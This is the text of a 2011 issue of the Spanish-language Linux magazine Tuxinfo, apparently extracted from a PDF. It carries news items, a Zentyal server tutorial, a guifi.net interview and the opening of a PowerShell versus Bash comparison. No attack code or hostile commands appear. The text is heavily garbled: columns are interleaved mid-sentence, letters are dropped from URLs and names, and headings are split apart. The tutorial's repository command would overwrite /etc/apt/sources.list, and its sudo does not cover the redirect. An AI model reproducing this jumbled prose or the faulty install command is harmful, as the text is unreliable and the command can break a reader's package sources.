tuxinfo 42
33
Editorial
44
Actualidad
8
Proyectos
Revista Tuxinfo
Zentyal: Servidor para Pymes
por Ignacio Huerta e Ibón Castil a
12
Proyectos
Esta revista se publica bajo una licencia de
Guifi.net: entrevistamos a sus iniciadores
Creative Commons CC BY­SA 3.0 Puedes
por Roger Baig Viñas y Jorge Cacho Hernández
copiar, distribuir, mostrar públicamente su
contenido y hacer obras derivadas, siempre y
cuando a) reconozcas los créditos de la obra
y b) la compartas bajo la misma licencia.
16
A fondo
Linux vs Windows, interpretando comandos

Microsoft, Apple, Sun, Oracle, así como otras marcas
por Rafael Muril o
comerciales mencionadas en esta revista son propiedad
de sus respectivas empresas.
20
Multimedia
Dirección, edición y coordinación
Dar color a una foto antigua
por Marcos "Anubis4d" Cabal ero
Ariel M. Corgateli
Marketing, edición y ventas
23
Proyectos
ClaudiaA. Juri
Proyecto Ceibal
por Naudy Vil ar oel Urquiola
Cor ección
Oscar Reckziegel
Luis Luque
26
Opinión
Vértigo

por Claudio de Brasi
Diseño de tapa
Marcos "Anubis4D" Cabalero
28
Seguridad
Diseño
Sql injection: Guerreros de la oscuridad
Jorge Cacho Hernández
por Marcelo Guaz ardo
38
TuxMóvil
web:
ht p:/ www.tuxinfo.com.ar
Especial Seguridad en Smartphones
facebook: ht p:/ www.facebook.com/tuxinfo
Asus Ess Pad Transformer
email:
info@tuxinfo.com.ar
por Rodolfo Mena
twit er:
@tuxinfo
42 57 AfondoCrossbow(I)Lapráctica
por Hernán "HeCSa" Saltiél


42
Editorial
Aquí estamos nuevamente con otro número
que fuera diferente a lo que expresaba
de Tuxinfo. Como siempre tratamos de
desde muchos años atrás. Se sobreentiende
cubrir los temas de mayor actualidad,
que Stalman es una persona de fuertes
excelentes informes, manuales en general.
ideales, los cuales hacen que desde su
Pero desde este lugar no quería dejar pasar
mirada sólo exista el blanco y el negro; sin
una situación que particularmente me lamó
poder congeniar con ninguna política
mucho la atención.
diferente a la que predica el software libre.
Puede que esté mal, o bien, pero es su
Como todos ya sabrán el deceso del ex
postura y debemos respetarla.
CEO de Apple, Steve Jobs, dio mucho que
hablar en el mundo, personas que quizás no
Para cambiar de tema, casi al cier e de esta
sabían de él salieron hablar, no se dejó de
edición nos enteramos que el mismo Mark
dar la noticia en un solo noticiero, pero lo
Shut leworth, en una entrevista para Zdnet,
Ariel M. Corgatel i
que más lamó la atención fueron los
expresaba que el próximo año tendremos
comentarios de Richard Stalman en base a
una nueva opción para los smartphones y
esta situación.
tabletas. Efectivamente se estará trabajando
en Ubuntu móvil. Excelente noticia por
Muchas personas desde el mundo Apple,
cierto.
criticaron las fuertes palabras de Stalman,
sin pensar realmente que él sólo habla de
Y para no abur irlos más con una extensa
sus acciones generadas en base a las
“editorial”, los invito directamente a leer
creaciones de Apple. En ningún caso habló
nuestra revista, y a formar parte de nuestro
específicamente de Jobs y mucho menos se
mapa de lectores.
contentó con su deceso. Esto generó que
Richard nuevamente tenga que salir a
Obviamente nos gustaría conocer la opinión
explicar sus palabras, y de alguna manera
de nuestros lectores, para lo cual los
suavizar sus palabras anteriores.
invitamos a que envíen un cor eo
electrónico
a
nuestra
editorial
Como editor de Tuxinfo y de forma personal
info@tuxinfo.com.ar Y como siempre
creo que todo el revuelo generado por los
agradecemos su preferencia por hacer clic
fanáticos de Apple, fueron reacciones
en la descarga, como así también los
desmedidas, ya que Stalman no dijo nada
invitamos a leer toda la edición.
Ún
Ú ete
t a nues
e tr
t os
o pod
o ca
c s
a t
s
Radio Geek
Podcast diario de actualidad tecnológica
De lunes a jueves de 23:15 a 23:45 (horaArgentina)
ht p:/ www.ustream.tv/channel/arielmcorg (en directo)
ht p:/ bitacora.blip.tv (en diferido)
Tuxinfo podcast
Podcast semanal sobre software libre
ht p:/ blip.tv/tuxinfo­podcast
3 www.tuxinfo.com.ar




Actualidad
Habrá tablets y smartphones con Ubuntu Linux
hace importante para nosotros legar los sistemas móvilesAndroid y iOS.
a la comunidad en estas plataformas”,
“por lo tanto vamos a aceptar el reto “La estrategia más inteligente para
de cómo usar Ubuntu en los fabricantes es jugar unos contra
Y el mismo Mark Shut leworth, fue smartphones, tabletas y pantalas otros. Por tanto, algunos quieren
quien lo confirmó en una entrevista inteligentes”
tener Ubuntu como un elemento
brindada a ZDnet. En donde explica
perturbador”, explicaba Shut leworth.
que si bien en principio no estaban En principio Mark explicó que primero
pensando en ingresar al mercado tiene trazado algunos planes. El El anuncio se hará de forma oficial en
móvil; hoy día se hace imperativo ya primero de elos es conseguir una la conferencia de desar oladores de
que con la gran caída de ventas de mayor estabildad con la próxima Orlando, y se habla de que el
netbooks y la mayor adopción de versión LTS (long term support) próximo año ya tendríamos Ubuntu
tabletas como smartphones, hizo que 12.04, brindar los últimos retoques a como segunda opción disponible.
reconsideráramos la opción.
Unity y luego iniciar el desembarco en
smartphones y tabletas.
Fuente: ZDnet
“A medida que las personas se han
trasladado desde el escritorio a Sin lugar a dudas, lo que se busca es (ht p:/ www.zdnet.com/blog/open­
nuevas formas de computación se crear un nuevo y gran competidor a source/ubuntu­linux­heads­to­
smartphones­tablets­and­smart­tvs/9834)
Entre nosotros: Google Chrome 15
que el usuario brinde conformidad) en de ejecución y sólo se añade la
el caso de Linux no es así. Ya que opción “nueva pestaña”.
para actualizarlo debemos dar
nuestro consentimiento.
Nuestra recomendación, como
siempre es decirles que actualicen si
Hablando específicamente de las es que no se realizó de forma
Sinceramente una gran velocidad novedades que encontramos, si bien automática.
tiene la gente de Chrome para lanzar en cada actualización hay nuevas
actualizaciones. Aclaro primero, que opciones, esta vez se hace mucho Fuente: Google Chrome Blog
si bien estas actualizaciones son hincapié en la cor ección de er ores,
silenciosas (es decir se realizan sin pulido de la interfaz, mayor velocidad (ht p:/ chrome.blogspot.com/2011/10/maki
ng­chrome­even­more­app­ealing.html)
4 www.tuxinfo.com.ar



Biografía Autorizada de Steve Jobs,
revela el odio que tenía a Android
lo necesito, y gastaré cada centavo cuerpo, no quería que me violaran de
de los 40.000 milones de dólares que esa forma”, y como se deben
Apple tiene en el banco para cor egir imaginar ya en el último tiempo se
esto. Voy a destruir Android porque es ar epentía.
un producto robado. Estoy dispuesto
a ir a una guer a termonuclear por Y otro punto que se muestra en el
esto”.
libro es sus escasos hábitos de
higiene personal, su habildad de
Además el libro habla de una reunión mirar objetos sin pestañear y
Si bien la biografía autorizada de con Schmidt, desde la cual Jobs dijo: obviamente los ataques de soberbia.
Steve Jobs saldrá a la venta el “No quiero tu dinero. Si me ofreces
próximo lunes, ya se han conocido 5.000 milones de dólares no los Para los fanáticos, les comunico que
algunos fragmentos interesantes de quiero. Tengo un montón de dinero. no falta mucho para la salida al
temas puntuales como por ejemplo su Quiero que deje de usar nuestras público en general.
pensamiento sobreAndroid.
ideas en Android, eso es todo lo que
quiero”.
Fuente:Associated Press
Walter Isaacson, el escritor de la
biografía es quien seguramente También habló de su cáncer de (ht p:/ hosted.ap.org/dynamic/stories/U/U
conoció más a Jobs por su trabajo. páncreas, el cual no quiso que se S_TEC_STEVE_JOBS_BOOK?SITE=CA
Algunas de los fragmentos son: operase alá por el 2004. Tratándolo RIE&SECTION=HOME&TEMPLATE=DEF
“Emplearé hasta mi último suspiro si sólo con una dieta estricta y remedios
naturales. “No quería que abrieran mi AULT)
El año entrante LibreOffice para Android y iOS
Desde The Document Foundation, se conocida OpenOf ice.
anunció que se está trabajando en un
proyecto para portar la suite ofimática Si por esas casualidades no conocen
LibreOf ice a las plataformas móviles la suite LibreOf ice, desde
Android y iOS.
Infosertec/Tuxinfo, les recomendamos
que ingresen a su web para
Obviamente
primero
estarán descargar la versión más reciente, de
disponibles en las tabletas y después forma completamente gratuita y como
en los smartphones. Excelente noticia de costumbre disponible para Linux,
por cierto.
Mac y Windows.
Para quienes no conozcan sobre The Comunicado de Prensa:
Document
Foundation,
les
comentamos que la misma es una ht p:/ blog.documentfoundation.org/20
organización no gubernamental 11/10/14/libreof ice­conference­
dedicada a trabajar en una suite announcements/
ofimática libre lamada LibreOf ice,
que a su vez es un fork de la tan
5 www.tuxinfo.com.ar



Netflix disponible para
tabletas y smartphones Android
lanzamiento de una nueva aplicación Los smartphones basados en Android
de Netflix para Android. La misma se están volviendo populares con
agrega compatibildad para tabletas rapidez. La firma de analistas Gartner
que ejecutan Android 3.x y, por Inc. espera que Android constituya el
primera vez, permite a los miembros 49% del mercado de smartphones en
de Netflix en Canadá y Latinoamérica 2012. Las tabletas basadas en
ver al instante series y películas Android son parte de una categoría
transmitidas desde Netflix en sus nueva, pero de rápido crecimiento.
smartphones y tabletas basadas en
Android.
Netflix es el servicio líder mundial de
suscripción por Internet para disfrutar
La nueva aplicación de Netflix para de películas y series. Los miembros
Android agrega las tabletas basadas de Netflix pueden ver al instante
en Android 3.x a la lista de series y películas de manera
dispositivos Android compatibles con ilmitada, transmitidas por Internet a
Netflix en los Estados Unidos y diversos dispositivos, incluidos PC,
aumenta considerablemente la Mac, televisores conectados a
cantidad de dispositivos compatibles Internet, consolas de juegos,
con Netflix en Canadá y reproductores de discos Blu­ray y
Latinoamérica. Los miembros de dispositivos móviles. En total, más de
Netflix pueden acceder al servicio en 700 dispositivos que transmiten
sus dispositivos Android instalando la desde Netflix están disponibles en los
Netflix, Inc. (NASDAQ: NFLX) versión 1.5 de la aplicación de Netflix, EE. UU., y un número creciente está
extendió la compatibildad con el disponible como descarga gratuita en disponible en Canadá y
sistema operativo Android para Android Market.
Latinoamérica.
teléfonos celulares gracias al
Fal ece el padre del lenguaje C y de Unix,
Dennis Ritchie
Dennis Ritchie, nacido en Bronxvile enfermedad, Dennis Ritchie (dmr) ha
(Nueva York) alá por 1941; fue el muerto en su casa este fin de
creador del lenguaje de programación semana”.
C (1973) y junto a Ken Thompson
desar oló el sistema operativo Unix, Añade luego que Ritchie “era un
cuya primera versión fue lanzada en hombre tranquilo y celoso de su
1971.
privacidad” y además confía en que
Seguramente no será tan recordado
“habrá gente que apreciará el alcance
como Steve Jobs, pero puedo La noticia fue informada por un de sus contribuciones y sentirá su
asegurar que fue una de las mentes comentario ingresado en la red social partida” ya que “el mundo ha perdido
más brilantes que pudimos tener. Google+ por Robert Pike: “Acabo de a una mente realmente grandiosa”.
enterarme de que tras una larga
6 www.tuxinfo.com.ar




Servidor para Pymes
Zentyal
POR IGNACIO HUERTA e IBÓN CASTILLA
¿Qué es Zentyal?
Zentyal podemos simplificar nuestro como Cortafuegos, Usuarios y
trabajo, tener una interfaz única de grupos, Mensajería Instantánea,
Como administradores de sistemas, administración y establecer un Cor eo electrónico, DHCP, DNS, NTP,
cada cierto tiempo nos toca instalar entorno estable sobre el que Samba, QoS, OpenVPN, Proxy
un nuevo servidor para una pequeña desar olar procedimientos de cache, etc.
red. Y en cada ocasión volvíamos al despliegue de servicios y planes de
mismo punto: ¿y ahora cómo mantenimiento.
Aunque existen otros proyectos como
hacemos para dar permisos SAMBA a
Webmin, en nuestra opinión Zentyal
unos usuarios y a otros no?, ¿y cómo Zentyal
resulta una interfaz mucho más
configuramos el servidor DHCP para
simple y focalizada en servicios muy
que se integre bien con el DNS Zentyal es un paquete de software concretos. Está diseñada para ayudar
local?. Lo que es una fortaleza se que se monta sobre un servidor al responsable de la red a configurar
convertía en debildad: los sistemas GNU/Linux diseñado para pequeñas y servidores de forma rápida, incluso
GNU/Linux disponen de multitud de medianas empresas. Se caracteriza para que personal de la propia
opciones para ofrecer un servicio, y por faciltar la gestión de los servicios entidad en la que se implanta pueda
es precisamente esa variedad la que de red más habituales de una forma administrar mínimamente ciertos
nos hacía dudar. El resultado eran cómoda y sencila. Zentyal tiene una aspectos de su infraestructura, como
demasiadas horas luchando con interfaz web sobre Ubuntu Server, y por ejemplo decidir qué usuarios
ficheros de configuración con sintaxis permite a través de dicha interfaz acceden a qué recursos y con qué
parecida pero diferente y realmente configurar los distintos servicios, permisos. Este aspecto es
nunca acababas satisfecho del todo adaptando los ficheros de fundamental a la hora de conceder
con la configuración, bien porque no configuración para que todo funcione acceso al personal de una empresa
tenías tiempo para dedicar a lo que el como la seda. Los servicios que que no tiene conocimientos de
servicio reclamaba o bien porque no ofrece Zentyal se ejecutan con administración
de
sistemas
quedaba lo suficientemente fina la software muy conocido en el mundo informáticos, pero sí la habildad
configuración.
GNU/Linux, como por ejemplo Bind suficiente como para manejar una
para ofrecer DNS, Samba para interfaz sencila de administración de
La realidad diaria nos dice que el 90% interconectar con redes Microsoft algunos servicios. Zentyal además
de las situaciones que se dan en Windows, etc. Zentyal ofrece para está más enfocada al mundo
PyMES a nivel de necesidad de todo este software una interfaz de empresarial, con servicios por
servicios y configuraciones es la administración única.
ejemplo de formación, planes de
misma. ¿Por qué entonces realizar
mantenimiento y subscripciones a
instalaciones artesanales y reinventar Zentyal divide los servicios en varios paquetes de actualizaciones.
la rueda?. Debe de haber alguna grupos: Zentyal Gateway, UTM,
manera de "automatizar" todo esto. .
Infraestructura,
Oficina
y El proyecto Zentyal nace en 2004
Comunicación unificada. Dentro de desde una empresa de Zaragoza con
¡Y vaya que si lo hay!. Gracias a estos grupos, se encuentran servicios el nombre inicial de eBox. En 2010
8 www.tuxinfo.com.ar




deciden cambiarle el nombre a varios metapaquetes, que coinciden ¡Manos a la obra!
Zentyal, coincidiendo con la salida de con los grupos que comentábamos
Ubuntu 10.04 LTS. Su modelo de anteriormente: zentyal­of ice, zentyal­ A modo de ejemplo vamos a
negocio se basa en la formación y el communication,
zentyal­security, configurar algunos servicios de red
soporte técnico, poniendo a zentyal­gateway,
zentyal­ con Zentyal. Vamos a configurar un
disposición del público descargas y infrastructure, y también uno para DHCP y un DNS, dos servicios muy
repositorios. Hoy en día funciona de instalar todo el software de Zentyal de comunes en cualquier red y que nos
forma estable, y representa una gran golpe: zentyal­al.
permitirán evaluar las capacidades de
alternativa libre a otras plataformas
Zentyal.
como Microsoft Windows Server.
Una vez instalado a través de
cualquiera de los métodos, y con la Asignación de IPs: DHCP
Instalación
paquetería mínima ya en nuestro
sistema, podemos acceder a la * Activamos el módulo DHCP en el
Podemos instalar Zentyal de dos interfaz web de administración. Como apartado de gestión de módulos:
maneras:
es web, basta abrir nuestro
navegador y acceder a la IP de
* Podemos primero instalar Ubuntu nuestro servidor a través del puerto
Server 10.04 LTS, y después utilzar 443
(HTTPS):
el repositorio de paquetes de Zentyal. ht ps:/ XXX.XXX.XXX.XXX/.
El
Para elo debemos añadir dicho usuario y contraseña que nos solicita
repositorio al sistema de paquetería Zentyal es el mismo que el del
de Ubuntu mediante estos comandos: servidor, son usuarios del sistema
Ubuntu.
sudo echo "deb
http://ppa.launchpad.net/zentya
l/2.0/ubuntu lucid main" >
/etc/apt/sources.list

sudo aptitude update
sudo aptitude install zentyal
* O podemos descargarnos la ISO
autoinstalable
desde
ht p:/ www.zentyal.org/downloads/
* Configuramos la interfaz de red que
(esta ISO es una Ubuntu Server
va a servir el DHCP. Es interesante
10.04 LTS con más paquetería
destacar que Zentyal permite servir
proporcionada por Zentyal), y luego
diferentes instancias DHCP a
instalar dicha imagen. El proceso de
distintas redes por diferentes tarjetas
instalación es el habitual de Ubuntu
de red:
Server, complementado por la
configuración propia de Zentyal.
Zentyal tiene estructura modular, por
lo que no hace falta instalar todo el
software desde el principio. Se puede
empezar con lo básico, y
posteriormente ir añadiendo módulos
a medida que se van necesitando.
Aparte de los paquetes individuales
para cada servicio, la gente de
Zentyal nos facilta la vida a través de
9 www.tuxinfo.com.ar





* Como veíamos en la imagen
anterior, una vez configuradas las
opciones del servicio, podemos ya
añadir un rango de IPs.
Elegimos el rango (IPs inicio y final
del rango) y el resultado final sería
algo como esto: (Imagen 2)
* Por último, añadiremos IPs
estáticas a ciertos clientes. Esto es
algo muy práctico, ya que nos
permite combinar dos situaciones
muy habituales con un solo servicio,
por un lado asignar IPs dinámicas a
clientes esporádicos (portátiles,
clientes wifi, etc) y por otro tener con
IPs fijas algunos equipos para poder
darles soporte, o para que
Imagen 1
simplemente sirvan otros servicios.
Para tener asignación de IPs fijas,
utilzaremos una funcionalidad muy
interesante de Zentyal: los Objetos.
(Imagen 3)
* Los Objetos son conjuntos de
equipos identificados por un nombre.
Creamos un nuevo Objeto (le
asignamos un nombre, por ejemplo
Equipos oficina) y seguidamente
Imagen 2
añadimos nuevo Miembro a ese
Objeto.
Cada Miembro es un equipo,
identificado por un nombre, una IP (la
que queremos que tenga ese equipo)
y su dirección MAC (que habremos
recopilado anteriormente). Una vez
creado el objeto, podremos volver a
la configuración del DHCP y crear un
grupo de IPs estáticas:
Imagen 3
* Nos vamos al servicio DHCP y El resto de pestañas del servicio
elegimos la tarjeta de red que permite configurar varias opciones,
acabamos de preparar, para como el tiempo de préstamo de IP, e
configurar las opciones del servicio. incluso opciones para un servicio * Elegimos el Objeto creado
Podemos
configurar
muchas PXE.
anteriormente añadiendo una
opciones (Imagen 1)
pequeña descripción:
10 www.tuxinfo.com.ar










* Añadimos un nuevo dominio, como
por ejemplo midominio.intranet, de
manera que los clientes después
tengan
la
forma
cliente1.midominio.intranet:
* Debemos recordar que
* Y este sería el resultado final:
anteriormente el DHCP se ha
(Imagen 4)
quedado sin configurar el DNS. Ahora
que tenemos nuestro dominio creado,
* Tras realizar estos pasos sólo nos
ya podemos terminar de configurar
queda guardar los cambios.
esa parte. Volvemos a la sección de
DHCP y activamos el DNS (Imagen
5)
Importante, ¡pulsar en Guardar!, ya
Servidor de nombres: DNS
que sino los cambios no se
* Seguidamente añadimos nuevos efectuarán, y nos tiraremos un rato
tratando de localizar por qué no
* Activamos el módulo DNS en el clientes al recién creado dominio, resuelven DNS nuestros clientes ;) Ya
apartado de gestión de módulos:
dando un nombre único y una IP
única.
tenemos nuestros dos servicios
configurados y funcionando.
Sería muy interesante que los clientes
se pudiesen importar desde el objeto Esta experiencia con dos de los
que hemos creado anteriormente, servicios que ofrece Zentyal sólo es
para no tener que duplicar el dato de un pequeño aperitivo de todo lo que
la IP en dos lugares, pero seguro que esconde.
Esperamos
hayáis
la gente de Zentyal está en elo, y si disfrutado con toda esta información
no, ¡hazles una propuesta! :)
y os animamos a probar más
servicios y finalmente a utilzar
Zentyal como solución en vuestros
servidores. Es una solución Software
Libre, y por si esto no bastase es
estable, madura y profesional. Salud
:)
* Tenemos la posibildad de añadir
uno o varios alias a cada cliente:
Documentación y referencias
* ht p:/ www.zentyal.com/es/: Información
sobre Zentyal y todos sus módulos.
* ht p:/ doc.zentyal.org/es/: Manual oficial
en castelano.
* ht p:/ forum.zentyal.org/: Foros de
Zentyal, un buen lugar en el que obtener
ayuda.
Imagen 4
Ignacio Huerta e Ibon Castil a
tecnicos@unoycero.com
ht p:/ www.unoycero.com
Imagen 5
11 www.tuxinfo.com.ar


guifi.net
Entrevistamos a sus iniciadores:
Ramon Roca y Lluís Dalmau
POR ROGER BAIG VIÑAS
y JORGE CACHO HERNÁNDEZ
i
m
a
g
e
n
t
o
m
a
d
a
d
e
h
t
p
:
/
r
o
u
r
e
.
a
c
t
.
u
j
i
.
e
s
Tras el análisis del concepto de Red coordinación de un grupo de operativos. La forma de crecer de
Abierta y sus implicaciones y la personas interesadas en desplegar guifi.net es orgánica, y típicamente
presentación del proyecto de una red de radio­enlaces para se expande en forma de "mancha
iniciativa ciudadana guifi.net de la formar
una
red
de de aceite", es decir, se va ampliando
edición pasada de TuxInfo, en este telecomunicaciones. Este grupo por los extremos, pero también van
número entrevistamos a Ramon estaba formado por personas de apareciendo islas de red que
Roca i Tió y a Lluís Dalmau i diferentes edades, de diferentes tienden a crecer para unirse entre
Junyent, iniciadores del proyecto y poblaciones y con diferentes niveles elas.
actualmente Presidente y Secretario de conocimiento de la tecnología,
de la Fundació Privada per a la pero con motivación y ganas de ¿Y fuera de Cataluña?
Xarxa Oberta, Lliure i Neutral hacer un proyecto que no pensase
guifi.net (Fundación Privada para la en clave local sino global y que no
Red Abierta, Libre y Neutral guifi.net) estuviese ligado a ningún ter itorio.
LD: En la península ibérica hay
respectivamente.
diversos focos en gestación, en
algunas zonas el nivel de
Ramon Roca: La motivación era crecimiento es muy elevado como
¿Cómo se podría definir guifi.net diversa: falta de oferta comercial, su en la zona de Castelón, donde el
para alguien que no lo conozca?
coste o el querer obtener efecto de la "mancha de aceite" se
alternativas para el acceso a observa claramente y se va
Lluís Dalmau: Es una red Internet, así como la inquietud para extendiendo por la zona este de la
ciudadana de telecomunicaciones, buscar nuevas oportunidades y península.
abierta, libre y neutral formada a soluciones para favorecer la
partir de la implicación de las capacidad de conexión propia, de ¿Es guifi.net un proyecto sólo
personas usuarias de la red que ciudadanos y de empresas mediante para entornos rurales o es
construyen tramos de redes de la creación un sistema fácilmente también aplicable a entornos
telecomunicaciones, reteniendo la replicable en cualquier zona.
urbanos?
titularidad de las infraestructuras y
operándolas en formato abierto y ¿Cuál es la actual implantación de
neutral e interconectándolas todas guifi.net en Cataluña?
RR: Es para cualquier entorno.
elas, creando así una gran red
común.
RR: Aunque alcanza un ter itorio LD: Existe en zonas urbanas,
bastante amplio, no alcanza aún en rurales e industriales, conectando
¿Cómo surgió guifi.net? ¿Qué fue su integridad. Actualmente ya está particulares,
empresas,
lo que os movió a crearla?
fuertemente desar olado en las administraciones, universidades,
comarcas centrales, donde ya se etc.
LD: guifi.net surgió a partir de la superan los 12.000 nodos
12 www.tuxinfo.com.ar


menos de 100€, y un usuario puede
armarlo por sí mismo si pone de su
parte. Lo ideal es complementar eso
con servicios profesionales, es decir,
que los usuarios puedan, si lo
prefieren, acudir a una tienda o un
profesional que se lo monte a
cambio de una compensación ya
que no a todo el mundo le apetecerá
hacérselo por si mismo.
¿Cómo ve la Administración
Pública a guifi.net?
RR:
Hay de todo. Las pequeñas y
más próximas a la ciudadanía tan
pronto constatan su práctica tienden
i
m
a
g
e
n
t
o
m
a
d
a
d
e
b
i
c
u
b
i
k
.
n
e
t

rápidamente a colaborar. A las
¿guifi.net aspira a sustituir a la de telecomunicaciones.
mayores les cuesta más ya sea
Internet
actual
o
a
porque rompe con las prácticas
complementarla?
tradicionales, o porque les causan
¿Qué tiene que hacer una persona un conflicto de interés en las
para unirse a la red de guifi.net?
relaciones que han desar olado con
RR: El objetivo no es sustituir a
grandes operadores.
Internet, sino impedir que Internet RR: Decir donde está, decidir cómo
quede cautiva de unos pocos se conecta, y hacerlo. Hay una
grandes operadores globales que se
LD: Relaciones que muchas veces
aplicación web en modo autoservicio
rigen únicamente por criterios
no
han
evolucionado
que le asiste.
comerciales y se adueñen de ela.
suficientemente a partir de las
Es bueno que existan alternativas, y
heredadas de la situación anterior a
mantener el carácter original de una LD:
En
castelano
en la liberalización del mercado de las
red abierta y disponible al público. ht p:/ guifi.net/trespasos
telecomunicaciones o inducidas por
En resumen, no queremos
las grandes operadoras tendiendo a
sustituirla, sino defenderla de ¿Es necesario tener un nodo la
monopolización
de
algunas de sus amenazas, mantener cercano?
infraestructuras, muchas veces
su espíritu inicial, y extenderla a
públicas.
todos.
RR: Bueno, es lo ideal, se hace para
ir creando red conectando unos con ¿Cuáles son los objetivos de
LD: guifi.net, con la implantación de otros, aunque siempre hay un nodo guifi.net en el medio y largo
la red abierta y neutral, favorece la que es el primero en cualquier zona plazo?
competencia que va a favor de los nueva. En el caso de nodos
operadores de telecomunicaciones inalámbricos, requiere línea de RR: A medio, conseguir un
pequeños y grandes, y la visión.
crecimiento sostenido y sostenible,
competitividad
favorece
casi mecánico y automático, que
directamente a las personas ¿Cuál es el coste de montar un siga expandiendo la red abierta. A
usuarias de la red y a la nodo
guifi.net?
¿Qué largo, que la red abierta sea lo que
competitividad de las empresas, ya conocimientos técnicos se permita por fin Internet para todos,
que tienen más y mejores necesitan?
que la alternativa exista en todas
oportunidades de acceso a las redes
partes.
RR: Un nodo simple puede costar
13 www.tuxinfo.com.ar



¿Por qué una Fundación?
RR:
Al ser una iniciativa ciudadana
que no es otra cosa que la
agregación de múltiples iniciativas
aisladas (la de cada uno), y con el
objeto de estar en igualdad de
condiciones respecto a los
operadores tradicionales, se
necesita una entidad jurídica que
adquiera la condición de operador
global desde un punto de vista
jurídico.
Por lo demás, es una institución más
para apoyar a la red abierta y libre.
i
m
a
g
e
n
t
o
m
a
d
a
d
e
h
t
p
:
/
l
i
c
a
m
u
n
t
.
w
o
r
d
p
r
e
s
s
.
c
o
m
LD: En 2008 se creó la Fundación
con el objeto de dotar al proyecto
con una entidad jurídica que le da
soporte para estar en igualdad de
condiciones respecto a los
operadores tradicionales, ya que las
normativas europeas y nacionales
requieren de la disposición de una
entidad jurídica que adquiera la
condición de operador de
telecomunicaciones global desde un
punto de vista jurídico. La
Fundación es una institución más
para apoyar a la red abierta, libre y
neutral. Una entidad que se creó a
partir de la aportación de las
personas que forman parte del
proyecto ciudadano guifi.net
Roger Baig Viñas
roger.baig@gmail.com
Jorge Cacho Hernández
ht ps:/ about.me/jorge.cacho.h
14 www.tuxinfo.com.ar




Linux vs Windows,
interpretando
comandos
POR RAFAEL MURILLO
Cuando hablamos de la “guer a” que Redmond “Windows PowerShel es Windows PowerShel por cada
hay entre los seguidores de Windows un complemento gratuito para versión del Sistema Windows
y los de Linux, siempre sale a relucir Windows XP y superior” que se
el potencial que tiene Windows para puede
descargar
desde
­ Debemos de tomar en cuenta, que
los juegos. . ¡claro! Los juegos son ht p:/ www.microsoft.com/powershel.
además de que existe una versión
cosa importante para todo
por cada versión de Sistema
administrador de una Red (ironía), y Si queremos hablar del “propósito” Windows, también existe una versión
por supuesto, la seguridad de una red para el cual fue hecho este para los Windows de 32 bits y otra
y la potencia de un Sistema Operativo complemento, podemos decir, y cito a para los de 64 bits. . ¡ojo con eso!
se mide en base a la cantidad de nuestra amiga la Wikipedia, “está
juegos que podemos ejecutar en una diseñada para su uso por parte de
computadora/servidor.
Y una vez que lo instalamos,
administradores de sistemas, con el Windows PowerShel aparecerá en el
propósito de automatizar tareas o Menú Inicio y será accesible dando
¿Pero qué pasa cuando realmente realizarlas de forma más controlada”, clic en el acceso directo o mediante
queremos comparar funcionalidad ni más ni menos.
la instrucción “PowerShel” dentro del
entre ambos sistemas? Pocas veces,
cuadro de diálogo de Ejecutar.
o ninguna vez, podrás leer o escuchar Ahora bien, primero y como ya lo
algo como lo que estoy por ofrecerte, resalté, PowerShel es un
no porque las escuelas sean malas, o
Ya cuando estamos dentro de la
complemento, no viene por omisión
los
maestros
no
tengan
aplicación, notamos en seguida una
instalado con los sistemas de
conocimientos (no sé si los tienen o
“dolencia”. . no tenemos la opción de
Microsoft. Segundo, para tenerlo
no), pero normalmente en las
“copiar” ni la de “pegar”con el
instalado necesitamos además
escuelas y obvio en Internet, no
teclado. . para eso tendremos que
instalar .NET Framework 2.0, que si
encontrarás información como la que
hacer un proceso un poco tardado,
no lo tenemos instalado, tendremos
sigue. Voy a darte una comparación
como es, seleccionar el texto, clic
que descargarlo por separado (no, no
del poder que ambos Sistemas
derecho, elegir copiar, luego clic
lo trae incluido el Windows
pueden legar a tener, o no tener,
derecho nuevamente, pegar.
PowerShel).
gracias a sus “shels”. Hablaré
entonces de Windows PowerShel,
Hasta el momento, sigo ignorando
GNU Shel y BASH (técnicamente son Pero eso no es todo queridos qué tiene de “poderosa” esta
dos y no tres, tomando en cuenta que lectores, a Microsoft le gusta her amienta, ya que el mismo
GNU Shel está basado en el Bash de ponernos las cosas difíciles (¿no que Microsoft dice que PowerShel, se
Unix, pero digamos que son tres).
muy user friendly?), y para variar, diferencía del CMD normal de
tenemos que tener en consideración Windows, por cerca de 100
algunas cosas antes de instalar
Windows PowerShel
comandos. . mismos que en esta
Windows PowerShel:
aplicación denominaron cmdlets
(conocidos
también
como
Citando las palabras de los de
­ Existe una versión diferente de commandlet).
16 www.tuxinfo.com.ar


crédito a Microsoft, es algo bastante interfaz).
bueno para lo pobre de su aplicación. Y si te preguntas, porque seguro lo
No voy a entrar mucho en detale con haces, ¿qué se puede hacer con el
los comandos de Windows Bash? Pues mediante las
PowerShel ya que no es ese el instrucciones que aporta el intérprete,
objetivo de esta nota, así que el usuario puede comunicarse con el
podemos cer ar la sección de dicha núcleo y obviamente, ejecutar dichas
aplicación, diciendo que es órdenes, así como her amientas que
únicamente, y como ya lo dije al le
permiten
controlar
el
principio de la nota, un complemento funcionamiento de la computadora
para los sistemas de Microsoft, y (mucho más que sólo automatizar
además, no se le acerca ni un poco al tareas ¿no?). Pero tal vez hasta
poder del Shel de Unix/Linux que ahora no te haya quedado claro el
veremos a continuación. Si bien, el poder del Bash o Shel de los
mayor logro de Windows PowerShel Sistemas Operativos basados en
Viéndolo desde un punto de vista más es la interacción que tiene con SQL UNIX. .
“linuxero”, Windows PowerShel es un Server, Exchange y con I S. Su mayor
intento burdo por copiar el Shel de utildad es automatizar tareas
Unix, ¡pero bastante burdo diría yo!
Si ya has probado Linux, en
administrativas.
Esto lo podemos notar en los
cualquiera de sus sabores, conoces
comandos para obtener la ayuda o
GNOME, KDE, etc. . Sabes que es
manuales de cada comando, como UNIX Shel /Linux Bash
digámoslo “fácilmente”, un entorno
por ejemplo, si queremos obtener la
gráfico. Pues bien, aunque por
ayuda sobre cualquier comando, la Voy a centrarme mucho más en lo omisión estás en lo cor ecto, también
sintaxis será la siguiente:
que es Linux Bash, pero se entiende podemos decir (y con toda confianza)
por omisión que al estar basado en el que todos elos son, o pueden ser
Shel de UNIX, ambos contendrán lamados como bash/shels visuales o
get-help *
prácticamente las mismas funciones.
bash/shels gráficas. De manera
Donde “*” lo remplazaremos por el
mucho más amplia, en UNIX/Linux,
comando del cual necesitamos Por definición, el Bash es un cualquier programa puede ser un
obtener ayuda
programa cuya función consiste en shel de usuario (dije puede ser, no
interpretar órdenes, dicho de otra siempre lo es). Esto es, los usuarios
